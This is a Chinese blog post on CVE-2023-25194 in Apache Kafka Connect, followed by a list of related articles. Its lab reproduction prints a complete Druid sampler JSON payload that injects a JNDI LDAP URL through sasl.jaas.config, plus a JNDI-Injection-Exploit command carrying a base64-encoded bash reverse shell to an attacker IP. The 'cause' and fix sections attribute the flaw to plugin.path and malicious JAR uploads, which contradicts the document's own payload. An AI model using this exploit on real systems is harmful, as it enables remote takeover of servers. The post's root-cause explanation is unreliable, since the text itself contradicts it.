CVE-2023-25194 漏洞分析:Apache Kafka Connect 远程代码执行漏洞

于 2025-04-25 15:59:22 发布
阅读量550 收藏 5
点赞数 16
文章标签: kafka 分布式
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_82311116/article/details/147514406
版权

漏洞概述

CVE-2023-25194 是 Apache Kafka Connect 中披露的一个高危远程代码执行(RCE)漏洞,允许未经授权的攻击者通过 REST API 构造恶意请求,在服务器上执行任意代码。

  • 漏洞编号:CVE-2023-25194

  • 影响组件:Apache Kafka Connect

  • 漏洞类型:远程代码执行(RCE)

  • 漏洞等级:高危

  • 公开时间:2023 年 2 月

  • 修复版本:Apache Kafka 3.4.0+

漏洞成因分析

Kafka Connect 是 Apache Kafka 提供的一个插件化框架,允许用户将 Kafka 与外部系统(如数据库、Elasticsearch、HDFS 等)连接。

Kafka Connect 提供了一个 REST 接口,允许动态上传 connector 的配置和插件路径。漏洞的关键在于:

服务端未对 plugin.path 参数进行严格限制,允许攻击者加载任意目录下的恶意 JAR 包。

攻击者可以伪造一个 connector 配置请求,指定 plugin.path 为任意路径(如 /tmp/evil/),并配合上传的恶意 JAR 文件,使 Kafka Connect 加载恶意类并执行,从而实现远程代码执行。

影响范围

受影响版本:

  • 所有 Apache Kafka < 3.4.0 的版本(主要影响 Kafka Connect 组件)

前提条件:

  • Kafka Connect 的 REST API 对外开放(默认监听在 8083 端口)

  • 未启用认证或鉴权机制

  • 攻击者能够上传或指定 JAR 路径

复现流程

环境使用vulhub

docker启动靶场环境---浏览器访问:xx.xx.xx.xx.:8888

首先来到漏洞位置

之后单击Apply,进行抓包

将下面的JSON替换

{
    "type":"kafka",
    "spec":{
        "type":"kafka",
        "ioConfig":{
            "type":"kafka",
            "consumerProperties":{
                "bootstrap.servers":"127.0.0.1:6666",
                "sasl.mechanism":"SCRAM-SHA-256",
                "security.protocol":"SASL_SSL",
                "sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://192.168.200.138:1389/tdk4dd\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
            },
            "topic":"test",
            "useEarliestOffset":true,
            "inputFormat":{
                "type":"regex",
                "pattern":"([\\s\\S]*)",
                "listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965",
                "columns":[
                    "raw"
                ]
            }
        },
        "dataSchema":{
            "dataSource":"sample",
            "timestampSpec":{
                "column":"!!!_no_such_column_!!!",
                "missingValue":"1970-01-01T00:00:00Z"
            },
            "dimensionsSpec":{

            },
            "granularitySpec":{
                "rollup":false
            }
        },
        "tuningConfig":{
            "type":"kafka"
        }
    },
    "samplerConfig":{
        "numRows":500,
        "timeoutMs":15000
    }
}

开启rmi服务的工具(启动的JAVA版本为java 8)

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwMC4xMzgvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}" -A 192.168.200.138

同时监听4444端口,此端口为上述base64加密的反弹shell端口

将上面代码中的IP:port替换成自己工具生成的命令

注意!!!必须要使用ldap://xxxx/xxxx,使用rmi的工具有回显,但是监听不到

替换完后进行放包

工具回显,监听成功

修复方案

Apache 在 3.4.0 版本中修复了该漏洞,修复措施包括:

  • 限制 plugin.path 参数来源

  • 禁止通过 REST 接口动态配置 plugin 路径

  • 强制使用服务端配置中明确指定的 plugin 路径

建议措施:

  1. 立即升级 Kafka 至 3.4.0 或以上版本

  2. 禁止公网直接访问 Kafka Connect REST 接口

  3. 启用认证与授权机制(如 Basic Auth、OAuth)

  4. 设置白名单 plugin.path,避免动态加载任意目录

.南城
关注
Apache Kafka 反序列化漏洞分析
JasaLee的博客
08-12 4831
Apache Kafaka 反序列化漏洞分析
【中危】Spring Kafka 反序列化漏洞 (CVE-2023-34040)
OSCS开源安全社区
08-25 973
墨知是国内首个专注软件供应链安全领域的技术社区,社区致力于为国内数百万技术人员提供全方位的软件供应链安全专业知识内容,包括软件供应链安全技术、漏洞情报、开源组件安全、SBOM、软件成分分析(SCA)、开源许可证合规等前沿技术及最佳实践。墨知通过促进知识共享、技术研究和合作交流,帮助组织和个人提高软件供应链的安全性,减少供应链攻击的风险,并保护软件生态系统的整体安全。
【高危】 Apache Kafka 远程代码执行漏洞复现及攻击拦截 (CVE-2023-25194)
Innocence_0的博客
07-22 708
Apache Kafka是一个分布式数据流处理平台,可以实时发布、订阅、存储和处理数据流。KafkaConnect是一种用于在kafka和其他系统之间可扩展、可靠的流式传输数据的工具。攻击者可以利用基于SASLJAAS 配置和SASL协议的任意Kafka客户端,对Kafka Connect worker 创建或修改连接器时,通过构造特殊的配置,进行JNDI 注入来实现远程代码执行
Apache Kafka JNDI注入(CVE-2023-25194)漏洞复现浅析
蚁景网安学院
03-23 1166
关于Apache Kafka是一个开源的分布式事件流平台,被数千家公司用于高性能数据管道、流分析、数据集成和任务关键型应用程序。影响版本2.4.0<=Apache kafka<=3.2.2环境搭建满足影响版本的应该都可以,这里我是使用的版本为2.5.0wget https://archive.apache.org/dist/kafka/2.5.0/kafka_2.13-2.5.0.tg...
Apache Kafka 漏洞CVE-2023-25194】说明及解决建议
热门推荐
EdwardWang_的博客
02-10 1万+
Apache Kafka 漏洞CVE-2023-25194】说明 及 解决建议
[CVE-2023-25194] 开源流处理平台Kafka JNDI注入漏洞
追光者的博客
03-12 603
[CVE-2023-25194] 开源流处理平台Kafka JNDI注入漏洞
Apache Kafka CVE-2023-25194(metasploit版)
m0_73605862的博客
12-06 640
首先,打开metasploit,然后查询需要攻击的板块,利用板块。进入到板块以后,我们需要查看配置信息,并且对端口,host,ssl,版本,payload等进行更改。然后修改完成以后,进行攻击。得到shell以后,验证成功。这个漏洞的payload要使用unix系统的python的shell的反向连接才能成功。Step3:访问特定端口,然后靶标应用。Step2:docker查看映射端口。Step1:用docker搭建环境。
修复 Apache Kafka 中的远程代码执行漏洞CVE-2023-25194
11-30 1338
Kafka Connect 中发现可能的 RCE 和拒绝服务问题。更新 阿帕奇软件基金会 (ASF) 已解决了一个漏洞,该漏洞可被利用来使用 Kafka Connect 发起远程代码执行 (RCE) 攻击。该关键漏洞于 2 月 8 日公布,被追踪为 CVE-2023-25194Apache Kafka ConnectApache Kafka 的一个免费开源组件,是系统、数据库和键值存储之间数据集成的中心枢纽。
CVE-2023-25194漏洞 Apache Kafka Connect JNDI注入漏洞
Fiverya的博客
02-10 3987
CVE-2023-25194漏洞
CVE-2023-25194 Kafka JNDI 注入分析
YJ_12340的博客
11-13 985
Apache Kafka 是一个分布式数据流处理平台,可以实时发布、订阅、存储和处理数据流。Kafka Connect 是一种用于在 kafka 和其他系统之间可扩展、可靠的流式传输数据的工具。攻击者可以利用基于 SASL JAAS 配置和 SASL 协议的任意 Kafka 客户端,对 Kafka Connect worker 创建或修改连接器时,通过构造特殊的配置,进行 JNDI 注入来实现远程代码执行
Kafka漏洞修复之CVE-2023-25194修复措施验证
CharlesYan的博客
02-19 5689
Apache Kafka Connect 模块通过JNDI 注入任意代码漏洞修复措施验证,包括Linux安装多版本JDK动态切换、验证OpenJDK与Kafka3.4.0的兼容性以及Linux中文件配置的优先级等
漏洞预警|Apache Kafka 拒绝服务漏洞
LJQClqjc的博客
09-22 955
棱镜七彩安全预警
Kafka反序列化RCE漏洞CVE-2023-34040)
蚁景网安学院
11-03 938
Spring Kafka 是 Spring Framework 生态系统中的一个模块,用于简化在 Spring 应用程序中集成 Apache Kafka 的过程,记录 (record) 指 Kafka 消息中的一条记录。这一个漏洞所影响的组件其实是 Spring-Kafka,严格意义上来说并不算是 kafka漏洞,应该算是 Spring 的漏洞
Apache Kafka 拒绝服务漏洞
OSCS开源安全社区
09-21 1731
1)没有身份验证的Kafka集群:任何能够与Broker建立网络连接的客户端都可能引发该问题。2)具有SASL身份验证的Kafka集群:任何能够与Broker建立网络连接而无需有效SASL凭据的客户端都可以触发问题。3)具有TLS身份验证的Kafka集群:只有能够通过TLS成功身份验证的客户端才能触发问题。OSCS(开源软件供应链安全社区)通过最快、最全的方式,发布开源项目最新的安全风险动态,包括开源组件安全漏洞、事件等信息。Apache Kafka是一个高度可扩展的分布式消息队列。
Kafka】log4j2漏洞不影响集群安全
扬_帆_起_航
12-01 532
虽然Kafka不会受此事件影响,但是Kafka客户端日志输出需要用户单独引用配置,所以大家还是注意一下是否使用受影响版本的log4j2.x进行日志打印。
Goby 漏洞发布|Apache Druid Kafka Connect 远程代码执行漏洞CVE-2024-25194)_druid kafka漏洞
最新发布
2301_82243100的博客
04-15 573
它设计用于处理大规模的实时数据,并提供快速的交互式查询和分析Apache Druid 使用了存在漏洞Kafka Connect,攻击者可访问Kafka Connect Worker,且可以创建或修改连接器时,通过设置sasl.jaas.config属性为恶意类,进而可导致JNDI注入漏洞,可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
Apache Kafka Clients JNDI注入漏洞 (CVE-2023-25194) vulhub复现
qq_53003652的博客
07-14 1366
在版本3.3.2及以前,Apache Kafka clients中存在一处JNDI注入漏洞Apache Kafka是一个开源分布式消息队列,Kafka clients是相对应的Java客户端。base64编码后为dG91Y2ggL3RtcC9sbV9oYWNrZXI=,则可以发起JNDI连接,进而导致JNDI注入漏洞,执行任意命令。可以看到lm_hacker文件被成功创建(hacker是测试过的)启动kali:192.168.126.128。发送数据包,回到靶机,进入漏洞目录下。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值